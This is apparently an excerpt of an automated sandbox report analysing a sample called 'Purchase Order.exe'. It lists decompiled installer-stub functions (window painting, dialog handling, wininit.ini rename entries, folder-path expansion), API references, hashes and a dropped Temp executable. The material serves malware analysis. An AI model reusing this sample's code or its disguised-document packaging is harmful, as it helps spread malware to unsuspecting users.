				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044CE(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434f10 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b234 = 0;
				return 0;
			}

0x0040466a
0x00404797
0x004047f4
0x004047f8
0x004048c5
0x004048c7
0x004048c7
0x004048cd
0x004048cd
0x004048d0
0x00000000
0x004048d7
0x00404806
0x0040480c
0x00404816
0x00404821
0x00404824
0x00404827
0x00404832
0x00404835
0x0040483c
0x00404849
0x0040485a
0x00404860
0x00404868
0x00404876
0x0040487c
0x0040487c
0x0040483c
0x00404886
0x00000000
0x00404891
0x00404895
0x004048a5
0x004048a5
0x004048ab
0x004048b7
0x004048b7
0x00000000
0x004048bb
0x00404886
0x004047a2
0x00000000
0x004047b4
0x004047b9
0x004047bf
0x00000000
0x00000000
0x004047e8
0x004047ea
0x004047ef
0x00000000
0x004047ef
0x004047a2
0x00404670
0x00404673
0x00404678
0x00404689
0x00404689
0x00404691
0x00404694
0x00404698
0x0040469b
0x0040469f
0x004046a2
0x004046a5
0x004046a8
0x004046af
0x004046b1
0x004046b1
0x004046bb
0x004046c8
0x004046d2
0x004046d7
0x004046da
0x004046df
0x004046f6
0x004046fd
0x00404710
0x00404713
0x00404727
0x0040472e
0x00404733
0x00404738
0x00404738
0x00404746
0x00404754
0x00404766
0x0040476b
0x0040477b
0x0040477d
0x00000000

APIs

CheckDlgButton.USER32 ref: 004046F6
GetDlgItem.USER32 ref: 0040470A
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
GetSysColor.USER32(?), ref: 00404738
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
lstrlenW.KERNEL32(?), ref: 00404759
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
GetDlgItem.USER32 ref: 004047D4
SendMessageW.USER32(00000000), ref: 004047DB
GetDlgItem.USER32 ref: 00404806
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
LoadCursorW.USER32(00000000,00007F02), ref: 00404857
SetCursor.USER32(00000000), ref: 0040485A
LoadCursorW.USER32(00000000,00007F00), ref: 00404873
SetCursor.USER32(00000000), ref: 00404876
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7

Strings

"C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe", xrefs: 00404835
N, xrefs: 004047F4

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: "C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe"$N
API String ID: 3103080414-1074881296
Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434f10;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406183(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x430908 = 0x55004e;
				 *0x43090c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
						_t53 = _t52 + 0x10;
						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
						_t12 = E0040602D(0x431108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FE8(_t24 + _t46, 0x430508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060DF(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040602D(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00406183
0x0040618c
0x00406193
0x0040619d
0x004061b1
0x004061d9
0x004061e4
0x004061e8
0x00406208
0x0040620f
0x00406219
0x00406226
0x0040622b
0x00406230
0x00406234
0x00406243
0x00406245
0x00406252
0x00406256
0x004062f1
0x00000000
0x0040626c
0x00406279
0x0040629d
0x004062a1
0x004062c0
0x004062c4
0x004062c4
0x004062c6
0x004062cf
0x004062da
0x004062e5
0x004062eb
0x00000000
0x004062eb
0x004062a3
0x004062a6
0x004062b1
0x004062ad
0x004062af
0x004062b0
0x004062b0
0x004062b8
0x004062ba
0x00000000
0x004062ba
0x00406284
0x0040628a
0x00000000
0x0040628a
0x00406256
0x00406234
0x004061b3
0x004061be
0x004061c7
0x004061cb
0x00000000
0x00000000
0x004061cb
0x004062fc

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
GetShortPathNameW.KERNEL32 ref: 004061C7

Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

GetShortPathNameW.KERNEL32 ref: 004061E4
wsprintfA.USER32 ref: 00406202
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
GlobalFree.KERNEL32 ref: 004062EB
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Strings

%ls=%ls, xrefs: 004061F8
[Rename], xrefs: 0040626C, 0040627E

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D

Uniqueness

Uniqueness Score: -1.00%

Function 0040657A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x433edc - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x434f38 + _t44 * 2;
				_t45 = 0x432ea0;
				_t108 = 0x432ea0;
				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040653D(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x432ea0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x436000;
								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
							} else {
								E00406484(_t108,  *0x434f08);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067C4(_t108);
							}
							goto L38;
						}
						if( *0x434f84 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x434f04;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E0040657A(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x0040657a
0x0040657a
0x0040657a
0x00406580
0x00406585
0x00406596
0x00406596
0x0040659e
0x0040659f
0x004065a0
0x004065a1
0x004065a4
0x004065ac
0x004065ae
0x004065bf
0x004065c2
0x004065c2
0x004065c6
0x004065cc
0x004065cf
0x004067aa
0x004067aa
0x004067b5
0x004067c1
0x004067c1
0x00000000
0x004065d5
0x004065da
0x004065ef
0x004065f0
0x004065f6
0x00406788
0x00406796
0x00406799
0x00406799
0x0040678a
0x0040678d
0x00406790
0x00406792
0x00406792
0x0040679b
0x0040679b
0x004067a1
0x004067a4
0x004065d7
0x00000000
0x004065d7
0x00000000
0x004067a4
0x004065fc
0x004065ff
0x0040660e
0x00406615
0x00406621
0x00406624
0x00406627
0x00406628
0x0040662d
0x00406633
0x00406636
0x00406639
0x0040672c
0x00406731
0x00406764
0x00406769
0x0040676e
0x00406773
0x00406773
0x00406778
0x0040677e
0x00406781
0x00000000
0x00406781
0x00406733
0x00406736
0x00406739
0x0040674e
0x00406755
0x0040673b
0x00406742
0x00406742
0x0040675d
0x00406760
0x00406724
0x00406725
0x00406725
0x00000000
0x00406760
0x00406646
0x0040664a
0x0040664a
0x0040664b
0x0040664d
0x0040668a
0x0040668d
0x0040669d
0x004066a0
0x004066a8
0x004066ae
0x004066ae
0x00406709
0x00406709
0x0040670b
0x00000000
0x00000000
0x004066b2
0x004066b7
0x004066b8
0x004066ba
0x004066d1
0x004066df
0x004066e5
0x004066e7
0x00406705
0x00406705
0x00406705
0x00000000
0x00406705
0x004066ed
0x004066f6
0x004066f9
0x004066ff
0x00406703
0x00000000
0x00000000
0x00000000
0x00406703
0x004066cb
0x004066cd
0x004066cf
0x00000000
0x00000000
0x00000000
0x004066cf
0x00000000
0x00406709
0x00406695
0x00000000
0x0040664f
0x0040666d
0x00406676
0x00406713
0x00406717
0x0040671f
0x0040671f
0x00000000
0x00406717
0x00406680
0x0040670d
0x00406711
0x00000000
0x00000000
0x00000000
0x00406711
0x0040664d
0x00000000
0x004065da

APIs

GetSystemDirectoryW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",00000400), ref: 00406695
GetWindowsDirectoryW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",00000400,00000000,0042C248,?,004055D6,0042C248,00000000,00000000,00423303,772EEA30), ref: 004066A8
lstrcatW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406663
"C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe", xrefs: 004065A4, 00406657, 0040665E, 00406662, 0040667F, 00406694, 004066A7, 004066BC, 004066E9, 0040671E, 00406724, 00406741, 00406754, 00406772, 00406778, 00406781, 004067B7
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406719

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: "C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe"$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-527386780
Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x00404512
0x004045c8
0x00000000
0x004045c8
0x00404523
0x00404527
0x00000000
0x00404541
0x00404541
0x0040454a
0x00000000
0x00000000
0x0040454c
0x00404558
0x0040455b
0x0040455b
0x00404561
0x00404567
0x00404567
0x00404573
0x00404579
0x00404580
0x00404583
0x00404586
0x00404588
0x00404588
0x00404590
0x00404596
0x00404596
0x004045a0
0x004045a5
0x004045a8
0x004045ad
0x004045b0
0x004045b0
0x004045c0
0x004045c0
0x00000000
0x004045c3

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040451D
GetSysColor.USER32(00000000), ref: 0040455B
SetTextColor.GDI32(?,00000000), ref: 00404567
SetBkMode.GDI32(?,?), ref: 00404573
GetSysColor.USER32(?), ref: 00404586
SetBkColor.GDI32(?,?), ref: 00404596
DeleteObject.GDI32(?), ref: 004045B0
CreateBrushIndirect.GDI32(?), ref: 004045BA

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
